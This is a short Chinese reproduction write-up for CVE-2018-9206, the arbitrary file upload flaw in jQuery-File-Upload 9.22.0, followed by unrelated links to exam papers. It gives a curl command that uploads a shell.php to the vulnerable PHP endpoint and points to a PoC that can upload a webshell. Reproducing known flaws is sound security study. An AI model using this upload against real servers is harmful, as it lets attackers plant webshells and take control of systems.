第1页 / 共1页
CVE-2018-9206 jQuery-File-Upload 9.22.0 文件上传漏洞复现.docx
复现:
jQuery-File-Upload 9.22.0 文件上传漏洞
jQuery-File-Upload 文件下载
https://github.com/blueimp/jQuery-File-Upload/tags
用 phpstudy 搭建环境
复现:
1、在本地建一个 shell.php
2、执行命令
curl
-F
"files=@shell.php"
http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php
shell.php 成功上传到了服务器。
也可以用下面的 poc 也可以检测,只需要修改上传文件内容,就可以传 webshell
https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206
相关推荐
2023年江西萍乡中考道德与法治真题及答案.doc
2012年重庆南川中考生物真题及答案.doc
2013年江西师范大学地理学综合及文艺理论基础考研真题.doc
2020年四川甘孜小升初语文真题及答案I卷.doc
2020年注册岩土工程师专业基础考试真题及答案.doc
2023-2024学年福建省厦门市九年级上学期数学月考试题及答案.doc
2021-2022学年辽宁省沈阳市大东区九年级上学期语文期末试题及答案.doc
2022-2023学年北京东城区初三第一学期物理期末试卷及答案.doc
2018上半年江西教师资格初中地理学科知识与教学能力真题及答案.doc
2012年河北国家公务员申论考试真题及答案-省级.doc
2020-2021学年江苏省扬州市江都区邵樊片九年级上学期数学第一次质量检测试题及答案.doc
2022下半年黑龙江教师资格证中学综合素质真题及答案.doc
